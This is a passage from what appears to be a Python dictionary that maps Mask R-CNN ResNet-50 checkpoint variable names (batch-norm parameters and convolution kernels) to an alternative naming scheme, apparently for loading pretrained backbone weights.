'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_6/batch_normalization_7/beta': 'resnet50/btlnck_block_0_1/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_6/batch_normalization_7/gamma': 'resnet50/btlnck_block_0_1/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_6/batch_normalization_7/moving_mean': 'resnet50/btlnck_block_0_1/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_6/batch_normalization_7/moving_variance': 'resnet50/btlnck_block_0_1/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_6/conv2d_7/kernel': 'resnet50/btlnck_block_0_1/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_7/batch_normalization_8/beta': 'resnet50/btlnck_block_0_2/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_7/batch_normalization_8/gamma': 'resnet50/btlnck_block_0_2/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_7/batch_normalization_8/moving_mean': 'resnet50/btlnck_block_0_2/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_7/batch_normalization_8/moving_variance': 'resnet50/btlnck_block_0_2/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_7/conv2d_8/kernel': 'resnet50/btlnck_block_0_2/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_8/batch_normalization_9/beta': 'resnet50/btlnck_block_0_2/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_8/batch_normalization_9/gamma': 'resnet50/btlnck_block_0_2/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_8/batch_normalization_9/moving_mean': 'resnet50/btlnck_block_0_2/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_8/batch_normalization_9/moving_variance': 'resnet50/btlnck_block_0_2/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_8/conv2d_9/kernel': 'resnet50/btlnck_block_0_2/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_9/batch_normalization_10/beta': 'resnet50/btlnck_block_0_2/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_9/batch_normalization_10/gamma': 'resnet50/btlnck_block_0_2/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_9/batch_normalization_10/moving_mean': 'resnet50/btlnck_block_0_2/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_9/batch_normalization_10/moving_variance': 'resnet50/btlnck_block_0_2/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_9/conv2d_10/kernel': 'resnet50/btlnck_block_0_2/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_10/batch_normalization_12/beta': 'resnet50/btlnck_block_1_0/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_10/batch_normalization_12/gamma': 'resnet50/btlnck_block_1_0/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_10/batch_normalization_12/moving_mean': 'resnet50/btlnck_block_1_0/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_10/batch_normalization_12/moving_variance': 'resnet50/btlnck_block_1_0/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_10/conv2d_12/kernel': 'resnet50/btlnck_block_1_0/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_11/batch_normalization_13/beta': 'resnet50/btlnck_block_1_0/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_11/batch_normalization_13/gamma': 'resnet50/btlnck_block_1_0/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_11/batch_normalization_13/moving_mean': 'resnet50/btlnck_block_1_0/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_11/batch_normalization_13/moving_variance': 'resnet50/btlnck_block_1_0/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_11/conv2d_13/kernel': 'resnet50/btlnck_block_1_0/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_12/batch_normalization_14/beta': 'resnet50/btlnck_block_1_0/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_12/batch_normalization_14/gamma': 'resnet50/btlnck_block_1_0/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_12/batch_normalization_14/moving_mean': 'resnet50/btlnck_block_1_0/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_12/batch_normalization_14/moving_variance': 'resnet50/btlnck_block_1_0/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_12/conv2d_14/kernel': 'resnet50/btlnck_block_1_0/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/shortcut/batch_normalization_11/beta': 'resnet50/btlnck_block_1_0/shortcut/conv2d/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/shortcut/batch_normalization_11/gamma': 'resnet50/btlnck_block_1_0/shortcut/conv2d/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/shortcut/batch_normalization_11/moving_mean': 'resnet50/btlnck_block_1_0/shortcut/conv2d/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/shortcut/batch_normalization_11/moving_variance': 'resnet50/btlnck_block_1_0/shortcut/conv2d/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/shortcut/conv2d_11/kernel': 'resnet50/btlnck_block_1_0/shortcut/conv2d/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_13/batch_normalization_15/beta': 'resnet50/btlnck_block_1_1/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_13/batch_normalization_15/gamma': 'resnet50/btlnck_block_1_1/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_13/batch_normalization_15/moving_mean': 'resnet50/btlnck_block_1_1/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_13/batch_normalization_15/moving_variance': 'resnet50/btlnck_block_1_1/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_13/conv2d_15/kernel': 'resnet50/btlnck_block_1_1/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_14/batch_normalization_16/beta': 'resnet50/btlnck_block_1_1/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_14/batch_normalization_16/gamma': 'resnet50/btlnck_block_1_1/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_14/batch_normalization_16/moving_mean': 'resnet50/btlnck_block_1_1/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_14/batch_normalization_16/moving_variance': 'resnet50/btlnck_block_1_1/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_14/conv2d_16/kernel': 'resnet50/btlnck_block_1_1/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_15/batch_normalization_17/beta': 'resnet50/btlnck_block_1_1/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_15/batch_normalization_17/gamma': 'resnet50/btlnck_block_1_1/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_15/batch_normalization_17/moving_mean': 'resnet50/btlnck_block_1_1/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_15/batch_normalization_17/moving_variance': 'resnet50/btlnck_block_1_1/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_15/conv2d_17/kernel': 'resnet50/btlnck_block_1_1/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_16/batch_normalization_18/beta': 'resnet50/btlnck_block_1_2/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_16/batch_normalization_18/gamma': 'resnet50/btlnck_block_1_2/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_16/batch_normalization_18/moving_mean': 'resnet50/btlnck_block_1_2/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_16/batch_normalization_18/moving_variance': 'resnet50/btlnck_block_1_2/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_16/conv2d_18/kernel': 'resnet50/btlnck_block_1_2/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_17/batch_normalization_19/beta': 'resnet50/btlnck_block_1_2/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_17/batch_normalization_19/gamma': 'resnet50/btlnck_block_1_2/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_17/batch_normalization_19/moving_mean': 'resnet50/btlnck_block_1_2/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_17/batch_normalization_19/moving_variance': 'resnet50/btlnck_block_1_2/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_17/conv2d_19/kernel': 'resnet50/btlnck_block_1_2/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_18/batch_normalization_20/beta': 'resnet50/btlnck_block_1_2/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_18/batch_normalization_20/gamma': 'resnet50/btlnck_block_1_2/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_18/batch_normalization_20/moving_mean': 'resnet50/btlnck_block_1_2/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_18/batch_normalization_20/moving_variance': 'resnet50/btlnck_block_1_2/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_18/conv2d_20/kernel': 'resnet50/btlnck_block_1_2/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_19/batch_normalization_21/beta': 'resnet50/btlnck_block_1_3/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_19/batch_normalization_21/gamma': 'resnet50/btlnck_block_1_3/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_19/batch_normalization_21/moving_mean': 'resnet50/btlnck_block_1_3/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_19/batch_normalization_21/moving_variance': 'resnet50/btlnck_block_1_3/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_19/conv2d_21/kernel': 'resnet50/btlnck_block_1_3/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_20/batch_normalization_22/beta': 'resnet50/btlnck_block_1_3/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_20/batch_normalization_22/gamma': 'resnet50/btlnck_block_1_3/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_20/batch_normalization_22/moving_mean': 'resnet50/btlnck_block_1_3/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_20/batch_normalization_22/moving_variance': 'resnet50/btlnck_block_1_3/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_20/conv2d_22/kernel': 'resnet50/btlnck_block_1_3/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_21/batch_normalization_23/beta': 'resnet50/btlnck_block_1_3/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_21/batch_normalization_23/gamma': 'resnet50/btlnck_block_1_3/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_21/batch_normalization_23/moving_mean': 'resnet50/btlnck_block_1_3/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_21/batch_normalization_23/moving_variance': 'resnet50/btlnck_block_1_3/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_21/conv2d_23/kernel': 'resnet50/btlnck_block_1_3/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_22/batch_normalization_25/beta': 'resnet50/btlnck_block_2_0/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_22/batch_normalization_25/gamma': 'resnet50/btlnck_block_2_0/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_22/batch_normalization_25/moving_mean': 'resnet50/btlnck_block_2_0/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_22/batch_normalization_25/moving_variance': 'resnet50/btlnck_block_2_0/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_22/conv2d_25/kernel': 'resnet50/btlnck_block_2_0/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_23/batch_normalization_26/beta': 'resnet50/btlnck_block_2_0/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_23/batch_normalization_26/gamma': 'resnet50/btlnck_block_2_0/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_23/batch_normalization_26/moving_mean': 'resnet50/btlnck_block_2_0/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_23/batch_normalization_26/moving_variance': 'resnet50/btlnck_block_2_0/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_23/conv2d_26/kernel': 'resnet50/btlnck_block_2_0/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_24/batch_normalization_27/beta': 'resnet50/btlnck_block_2_0/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_24/batch_normalization_27/gamma': 'resnet50/btlnck_block_2_0/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_24/batch_normalization_27/moving_mean': 'resnet50/btlnck_block_2_0/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_24/batch_normalization_27/moving_variance': 'resnet50/btlnck_block_2_0/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_24/conv2d_27/kernel': 'resnet50/btlnck_block_2_0/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/shortcut/batch_normalization_24/beta': 'resnet50/btlnck_block_2_0/shortcut/conv2d/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/shortcut/batch_normalization_24/gamma': 'resnet50/btlnck_block_2_0/shortcut/conv2d/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/shortcut/batch_normalization_24/moving_mean': 'resnet50/btlnck_block_2_0/shortcut/conv2d/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/shortcut/batch_normalization_24/moving_variance': 'resnet50/btlnck_block_2_0/shortcut/conv2d/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/shortcut/conv2d_24/kernel': 'resnet50/btlnck_block_2_0/shortcut/conv2d/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_25/batch_normalization_28/beta': 'resnet50/btlnck_block_2_1/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_25/batch_normalization_28/gamma': 'resnet50/btlnck_block_2_1/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_25/batch_normalization_28/moving_mean': 'resnet50/btlnck_block_2_1/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_25/batch_normalization_28/moving_variance': 'resnet50/btlnck_block_2_1/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_25/conv2d_28/kernel': 'resnet50/btlnck_block_2_1/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_26/batch_normalization_29/beta': 'resnet50/btlnck_block_2_1/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_26/batch_normalization_29/gamma': 'resnet50/btlnck_block_2_1/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_26/batch_normalization_29/moving_mean': 'resnet50/btlnck_block_2_1/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_26/batch_normalization_29/moving_variance': 'resnet50/btlnck_block_2_1/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_26/conv2d_29/kernel': 'resnet50/btlnck_block_2_1/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_27/batch_normalization_30/beta': 'resnet50/btlnck_block_2_1/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_27/batch_normalization_30/gamma': 'resnet50/btlnck_block_2_1/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_27/batch_normalization_30/moving_mean': 'resnet50/btlnck_block_2_1/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_27/batch_normalization_30/moving_variance': 'resnet50/btlnck_block_2_1/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_27/conv2d_30/kernel': 'resnet50/btlnck_block_2_1/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_28/batch_normalization_31/beta': 'resnet50/btlnck_block_2_2/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_28/batch_normalization_31/gamma': 'resnet50/btlnck_block_2_2/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_28/batch_normalization_31/moving_mean': 'resnet50/btlnck_block_2_2/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_28/batch_normalization_31/moving_variance': 'resnet50/btlnck_block_2_2/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_28/conv2d_31/kernel': 'resnet50/btlnck_block_2_2/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_29/batch_normalization_32/beta': 'resnet50/btlnck_block_2_2/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_29/batch_normalization_32/gamma': 'resnet50/btlnck_block_2_2/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_29/batch_normalization_32/moving_mean': 'resnet50/btlnck_block_2_2/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_29/batch_normalization_32/moving_variance': 'resnet50/btlnck_block_2_2/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_29/conv2d_32/kernel': 'resnet50/btlnck_block_2_2/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_30/batch_normalization_33/beta': 'resnet50/btlnck_block_2_2/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_30/batch_normalization_33/gamma': 'resnet50/btlnck_block_2_2/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_30/batch_normalization_33/moving_mean': 'resnet50/btlnck_block_2_2/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_30/batch_normalization_33/moving_variance': 'resnet50/btlnck_block_2_2/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_30/conv2d_33/kernel': 'resnet50/btlnck_block_2_2/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_31/batch_normalization_34/beta': 'resnet50/btlnck_block_2_3/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_31/batch_normalization_34/gamma': 'resnet50/btlnck_block_2_3/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_31/batch_normalization_34/moving_mean': 'resnet50/btlnck_block_2_3/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_31/batch_normalization_34/moving_variance': 'resnet50/btlnck_block_2_3/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_31/conv2d_34/kernel': 'resnet50/btlnck_block_2_3/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_32/batch_normalization_35/beta': 'resnet50/btlnck_block_2_3/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_32/batch_normalization_35/gamma': 'resnet50/btlnck_block_2_3/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_32/batch_normalization_35/moving_mean': 'resnet50/btlnck_block_2_3/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_32/batch_normalization_35/moving_variance': 'resnet50/btlnck_block_2_3/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_32/conv2d_35/kernel': 'resnet50/btlnck_block_2_3/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_33/batch_normalization_36/beta': 'resnet50/btlnck_block_2_3/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_33/batch_normalization_36/gamma': 'resnet50/btlnck_block_2_3/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_33/batch_normalization_36/moving_mean': 'resnet50/btlnck_block_2_3/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_33/batch_normalization_36/moving_variance': 'resnet50/btlnck_block_2_3/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_33/conv2d_36/kernel': 'resnet50/btlnck_block_2_3/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_34/batch_normalization_37/beta': 'resnet50/btlnck_block_2_4/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_34/batch_normalization_37/gamma': 'resnet50/btlnck_block_2_4/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_34/batch_normalization_37/moving_mean': 'resnet50/btlnck_block_2_4/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_34/batch_normalization_37/moving_variance': 'resnet50/btlnck_block_2_4/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_34/conv2d_37/kernel': 'resnet50/btlnck_block_2_4/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_35/batch_normalization_38/beta': 'resnet50/btlnck_block_2_4/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_35/batch_normalization_38/gamma': 'resnet50/btlnck_block_2_4/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_35/batch_normalization_38/moving_mean': 'resnet50/btlnck_block_2_4/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_35/batch_normalization_38/moving_variance': 'resnet50/btlnck_block_2_4/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_35/conv2d_38/kernel': 'resnet50/btlnck_block_2_4/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_36/batch_normalization_39/beta': 'resnet50/btlnck_block_2_4/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_36/batch_normalization_39/gamma': 'resnet50/btlnck_block_2_4/bottleneck_3/BatchNorm/gamma',
